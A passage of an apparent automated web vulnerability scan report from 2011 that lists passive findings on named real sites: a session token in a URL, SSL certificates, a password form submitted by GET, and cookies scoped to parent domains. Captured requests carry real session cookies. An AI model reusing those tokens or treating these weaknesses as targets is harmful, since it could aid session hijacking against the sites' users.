Dparent%26transport%3Dpostmessage%26frame%3Df19a36be4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3e5d649a8%26origin%3Dhttp%253A%252F%252Fservicetips.whitefence.com%252Ff22e23ccd4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df19a36be4&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://servicetips.whitefence.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.33.58
X-Cnection: close
Date: Tue, 06 Sep 2011 11:59:40 GMT
Content-Length: 264

<script type="text/javascript">
parent.postMessage("cb=f244af3cd8&origin=http\u00253A\u00252F\u00252Fservicetips.whitefence.com\u00252Ff22e23ccd4&relation=parent&transport=postmessage&frame=f19a36be4"
...[SNIP]...

6.6. http://www.websitealive9.com/2140/visitor/vTrackerSrc_v2.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.websitealive9.com
Path:   /2140/visitor/vTrackerSrc_v2.asp

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /2140/visitor/vTrackerSrc_v2.asp?action=poll&groupid=2140&websiteid=344&departmentid=0&sessionid_=5023123106106&dt=Free%20Home%20Phone%20Service%20%7C%20Ooma&dl=http%3A%2F%2Fwww.ooma.com%2F&rf=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&wsa_custom_str=^^^^&random=0.13534958101809025 HTTP/1.1
Host: www.websitealive9.com
Proxy-Connection: keep-alive
Referer: http://www.ooma.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCSBBAQDQ=KNPPIJFCDJONDIJLJCFHAILK

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: no-store, must-revalidate, private
Pragma: no-cache
P3P: CP="NOI DSP COR CURa OUR NOR"
Content-Length: 0
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Cache-control: private


7. SSL certificate  previous  next
There are 15 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.



7.1. https://login.yahoo.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://login.yahoo.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  login.yahoo.com
Issued by:  DigiCert High Assurance CA-3
Valid from:  Mon Dec 20 18:00:00 GMT-06:00 2010
Valid to:  Thu Jan 03 17:59:59 GMT-06:00 2013

Certificate chain #1

Issued to:  DigiCert High Assurance CA-3
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Mon Apr 02 18:00:00 GMT-06:00 2007
Valid to:  Sat Apr 02 18:00:00 GMT-06:00 2022

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Jan 13 13:20:32 GMT-06:00 2010
Valid to:  Wed Sep 30 12:19:47 GMT-06:00 2015

Certificate chain #3

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 18:29:00 GMT-06:00 1998
Valid to:  Mon Aug 13 17:59:00 GMT-06:00 2018

7.2. https://www.comcastsupport.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://www.comcastsupport.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificate:

Issued to:  www.comcastsupport.com
Issued by:  VeriSign Class 3 Secure Server CA - G3
Valid from:  Tue May 17 18:00:00 GMT-06:00 2011
Valid to:  Fri Jul 20 17:59:59 GMT-06:00 2012

7.3. https://www.frontier.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  *.frontier.com
Issued by:  DigiCert High Assurance CA-3
Valid from:  Sun May 01 18:00:00 GMT-06:00 2011
Valid to:  Thu Jun 07 06:00:00 GMT-06:00 2012

Certificate chain #1

Issued to:  DigiCert High Assurance CA-3
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Mon Apr 02 18:00:00 GMT-06:00 2007
Valid to:  Sat Apr 02 18:00:00 GMT-06:00 2022

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Sat Sep 30 23:00:00 GMT-06:00 2006
Valid to:  Sat Jul 26 12:15:15 GMT-06:00 2014

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 10:09:40 GMT-06:00 1999
Valid to:  Sat May 25 10:39:40 GMT-06:00 2019

7.4. https://customer.comcast.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://customer.comcast.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  customer.comcast.com
Issued by:  VeriSign Class 3 Secure Server CA - G2
Valid from:  Mon Oct 05 18:00:00 GMT-06:00 2009
Valid to:  Sat Oct 08 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G2
Issued by:  VeriSign Trust Network
Valid from:  Tue Mar 24 18:00:00 GMT-06:00 2009
Valid to:  Sun Mar 24 17:59:59 GMT-06:00 2019

Certificate chain #2

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 18:00:00 GMT-06:00 1998
Valid to:  Tue Aug 01 17:59:59 GMT-06:00 2028

7.5. https://go.ooma.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://go.ooma.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.ooma.com
Issued by:  VeriSign Class 3 Secure Server CA - G3
Valid from:  Wed Dec 15 18:00:00 GMT-06:00 2010
Valid to:  Wed Dec 28 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:  Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

7.6. https://login.aptela.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.aptela.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.aptela.com
Issued by:  GeoTrust SSL CA
Valid from:  Wed Aug 03 20:56:29 GMT-06:00 2011
Valid to:  Thu Oct 04 22:38:24 GMT-06:00 2012

Certificate chain #1

Issued to:  GeoTrust SSL CA
Issued by:  GeoTrust Global CA
Valid from:  Fri Feb 19 16:39:26 GMT-06:00 2010
Valid to:  Tue Feb 18 16:39:26 GMT-06:00 2020

Certificate chain #2

Issued to:  GeoTrust Global CA
Issued by:  Equifax Secure Certificate Authority
Valid from:  Mon May 20 22:00:00 GMT-06:00 2002
Valid to:  Mon Aug 20 22:00:00 GMT-06:00 2018

Certificate chain #3

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:  Wed Aug 22 10:41:51 GMT-06:00 2018

7.7. https://login.comcast.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.comcast.net
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  login.comcast.net
Issued by:  VeriSign Class 3 Secure Server CA - G2
Valid from:  Tue Jul 27 18:00:00 GMT-06:00 2010
Valid to:  Mon Aug 13 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G2
Issued by:  VeriSign Trust Network
Valid from:  Tue Mar 24 18:00:00 GMT-06:00 2009
Valid to:  Sun Mar 24 17:59:59 GMT-06:00 2019

Certificate chain #2

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 18:00:00 GMT-06:00 1998
Valid to:  Tue Aug 01 17:59:59 GMT-06:00 2028

7.8. https://login.frontier.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.frontier.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  login.frontier.com
Issued by:  GeoTrust DV SSL CA
Valid from:  Sun Dec 05 02:33:26 GMT-06:00 2010
Valid to:  Tue Jan 05 19:09:33 GMT-06:00 2016

Certificate chain #1

Issued to:  GeoTrust DV SSL CA
Issued by:  GeoTrust Global CA
Valid from:  Fri Feb 26 15:32:31 GMT-06:00 2010
Valid to:  Tue Feb 25 15:32:31 GMT-06:00 2020

Certificate chain #2

Issued to:  GeoTrust Global CA
Issued by:  GeoTrust Global CA
Valid from:  Mon May 20 22:00:00 GMT-06:00 2002
Valid to:  Fri May 20 22:00:00 GMT-06:00 2022

7.9. https://login.frontiermobile.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.frontiermobile.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  login.frontiermobile.com
Issued by:  GeoTrust DV SSL CA
Valid from:  Tue Nov 16 22:07:38 GMT-06:00 2010
Valid to:  Wed Jan 01 07:58:06 GMT-06:00 2014

Certificate chain #1

Issued to:  GeoTrust DV SSL CA
Issued by:  GeoTrust Global CA
Valid from:  Fri Feb 26 15:32:31 GMT-06:00 2010
Valid to:  Tue Feb 25 15:32:31 GMT-06:00 2020

Certificate chain #2

Issued to:  GeoTrust Global CA
Issued by:  GeoTrust Global CA
Valid from:  Mon May 20 22:00:00 GMT-06:00 2002
Valid to:  Fri May 20 22:00:00 GMT-06:00 2022

7.10. https://us.etrade.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://us.etrade.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  us.etrade.com
Issued by:  VeriSign Class 3 Extended Validation SSL CA
Valid from:  Mon Jun 27 18:00:00 GMT-06:00 2011
Valid to:  Wed Jun 27 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

7.11. https://www.comcast.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcast.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.comcast.com
Issued by:  VeriSign Class 3 Secure Server CA - G2
Valid from:  Sun Oct 18 18:00:00 GMT-06:00 2009
Valid to:  Tue Nov 15 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G2
Issued by:  VeriSign Trust Network
Valid from:  Tue Mar 24 18:00:00 GMT-06:00 2009
Valid to:  Sun Mar 24 17:59:59 GMT-06:00 2019

Certificate chain #2

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 18:00:00 GMT-06:00 1998
Valid to:  Tue Aug 01 17:59:59 GMT-06:00 2028

7.12. https://www.fidelity.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fidelity.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.fidelity.com,ST=MASSACHUSETTS
Issued by:  Akamai Subordinate CA 3
Valid from:  Thu Nov 18 08:58:06 GMT-06:00 2010
Valid to:  Fri Nov 18 08:58:06 GMT-06:00 2011

Certificate chain #1

Issued to:  Akamai Subordinate CA 3
Issued by:  GTE CyberTrust Global Root
Valid from:  Thu May 11 09:32:00 GMT-06:00 2006
Valid to:  Sat May 11 17:59:00 GMT-06:00 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 18:29:00 GMT-06:00 1998
Valid to:  Mon Aug 13 17:59:00 GMT-06:00 2018

7.13. https://www.frontiermobile.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.frontiermobile.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.frontiermobile.com
Issued by:  GeoTrust DV SSL CA
Valid from:  Thu Dec 09 03:40:40 GMT-06:00 2010
Valid to:  Sun Jan 10 02:11:54 GMT-06:00 2016

Certificate chain #1

Issued to:  GeoTrust DV SSL CA
Issued by:  GeoTrust Global CA
Valid from:  Fri Feb 26 15:32:31 GMT-06:00 2010
Valid to:  Tue Feb 25 15:32:31 GMT-06:00 2020

Certificate chain #2

Issued to:  GeoTrust Global CA
Issued by:  GeoTrust Global CA
Valid from:  Mon May 20 22:00:00 GMT-06:00 2002
Valid to:  Fri May 20 22:00:00 GMT-06:00 2022

7.14. https://www.optionshouse.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.optionshouse.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.optionshouse.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Thu Dec 30 12:49:32 GMT-06:00 2010
Valid to:  Fri Dec 30 12:49:32 GMT-06:00 2011

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 GMT-06:00 2006
Valid to:  Sun Nov 15 19:54:37 GMT-06:00 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  http://www.valicert.com/
Valid from:  Tue Jun 29 11:06:20 GMT-06:00 2004
Valid to:  Sat Jun 29 11:06:20 GMT-06:00 2024

Certificate chain #3

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 18:19:54 GMT-06:00 1999
Valid to:  Tue Jun 25 18:19:54 GMT-06:00 2019

Certificate chain #4

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 18:19:54 GMT-06:00 1999
Valid to:  Tue Jun 25 18:19:54 GMT-06:00 2019

7.15. https://www.usps.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.usps.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.usps.com,ST=MINNESOTA
Issued by:  Akamai Subordinate CA 3
Valid from:  Thu Jul 21 06:49:58 GMT-06:00 2011
Valid to:  Sat Jul 21 06:49:58 GMT-06:00 2012

Certificate chain #1

Issued to:  Akamai Subordinate CA 3
Issued by:  GTE CyberTrust Global Root
Valid from:  Thu May 11 09:32:00 GMT-06:00 2006
Valid to:  Sat May 11 17:59:00 GMT-06:00 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 18:29:00 GMT-06:00 1998
Valid to:  Mon Aug 13 17:59:00 GMT-06:00 2018

8. Password field submitted using GET method  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.optionshouse.com
Path:   /tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password fields:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request

GET /tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp HTTP/1.1
Host: www.optionshouse.com
Connection: keep-alive
Referer: http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/?utm_source=yhofin&utm_medium=paid-banner-ads&utm_campaign=120x60-QuotesBttn&utm_content=stock:oldGrnBlk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LiveBall=uid=699982&uky=G2W1TS8H&rid=764602

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 06 Sep 2011 12:49:02 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 19900


<!DOCTYPE html
   PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
...[SNIP]...
</div>

       <form data-actions="[
           {
               action: 'validator',
               triggerEvent: 'validate'
           },
           {
               action: 'removeNonVisibleFormFields',
               triggerEvent: 'handleNonVisibleFormFields',
               fieldNamesToSkip: [
                   'login.userName',
                   'login.password',
                   'login.passwordConfirm',
                   'login.securityQuestion',
                   'login.securityAnswer'
               ]
           },
           {
               action: 'createLogin',
               triggerEvent: 'loginCreate'
           },
           {
               action: 'contextualHelp'
           },
           {
               action: 'controller',
               beforeSubmitEvents: [ 'validate', 'handleNonVisibleFormFields', 'loginCreate' ],
               skipApplicationFind: true,
               skipHandleNonVisibleFormFields: true
           }
       ]">


       <fieldset class="textGroup">
...[SNIP]...
</label>
   
                       <input type="password" class="text large" id="password" name="login.password" minlength="6" maxlength="20" />
   
                       <div class="help">
...[SNIP]...
</label>
                       <input type="password" class="text large" id="passwordConfirm" name="login.passwordConfirm" minlength="6" maxlength="20" />
                        <div class="help">
...[SNIP]...

9. Cookie scoped to parent domain  previous  next
There are 52 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


9.1. http://pixel.everesttech.net/2565/c  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://pixel.everesttech.net
Path:   /2565/c

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /2565/c?ev_ct=d&ev_sid=54&ev_ci=1660002714&ev_ai=1660082513&ev_cri=1660643811&url=http%3A//landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/%3Futm_source%3Dyhofin%26utm_medium%3Dpaid-banner-ads%26utm_campaign%3D120x60-QuotesBttn%26utm_content%3Dstock%3AoldGrnBlk HTTP/1.1
Host: pixel.everesttech.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N6067.160910.7443114402621/B5129127.36;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15srre13t/M=601454399.602194378.673385551.687570551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sGXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=1/X=3/*;ord=1315313295039208?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gglck=zqROZUBXyFQAAIdR; everest_session_v2=AXNOZhaIGXMAAIM3; everest_g_v2=g_surferid~zqROZUBXyFQAAIdR

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:48:34 GMT
Server: Apache
Set-Cookie: everest_session_v2=AXNOZhaIGXMAAIM3; path=/; domain=.everesttech.net
Set-Cookie: everest_g_v2=g_surferid~zqROZUBXyFQAAIdR; path=/; domain=.everesttech.net; expires=Tue, 10-Sep-2030 23:28:34 GMT
P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM"
Cache-Control: no-cache
Location: http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/?utm_source=yhofin&utm_medium=paid-banner-ads&utm_campaign=120x60-QuotesBttn&utm_content=stock:oldGrnBlk
Content-Length: 364
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://landing.optionshouse.com/rate/395/yhofin
...[SNIP]...

9.2. http://pixel.everesttech.net/2565/i  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://pixel.everesttech.net
Path:   /2565/i

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /2565/i?ev_sid=54&ev_ci=1660002714&ev_ai=1660082513&ev_cri=1660643811 HTTP/1.1
Host: pixel.everesttech.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N6067.160910.7443114402621/B5129127.36;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15uql37a6/M=601454399.602194378.673385551.687570551/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=n9rGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=2892168919546073312/R=1/X=3/*;ord=1315313286070877?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gglck=zqROZUBXyFQAAIdR; everest_g_v2=g_surferid~zqROZUBXyFQAAIdR

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:09 GMT
Server: Apache
Set-Cookie: everest_session_v2=AXNOZhaIGXMAAIM3; path=/; domain=.everesttech.net
Set-Cookie: everest_g_v2=g_surferid~zqROZUBXyFQAAIdR; path=/; domain=.everesttech.net; expires=Tue, 10-Sep-2030 23:28:09 GMT
P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM"
Cache-Control: no-cache
Vary: X-EF-Forwarded-For,Cookie,Host
Last-Modified: Tue, 22 Mar 2011 22:39:33 GMT
ETag: "2051142-80-49f19eb07d340"
Accept-Ranges: bytes
Content-Length: 128
Content-Type: image/png

.PNG
.
...IHDR.....................bKGD.............    pHYs...........~.....tIME......).......IDATx.c````........E@....IEND.B`.

9.3. http://40.xg4ken.com/media/redir.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://40.xg4ken.com
Path:   /media/redir.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/redir.php?prof=85&camp=2140&affcode=kw94444&cid=13569521491&networkType=search&url[]=http%3A%2F%2Fwww.whitefence.com%2Fcategory%2Fhome-phone%2F HTTP/1.1
Host: 40.xg4ken.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:51:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564; expires=Mon, 05-Dec-2011 11:51:52 GMT; path=/; domain=.xg4ken.com
Location: http://www.whitefence.com/category/home-phone/
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


9.4. http://ad.agkn.com/iframe!t=1129!  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1129!

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /iframe!t=1129!?che=352364418348669671&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
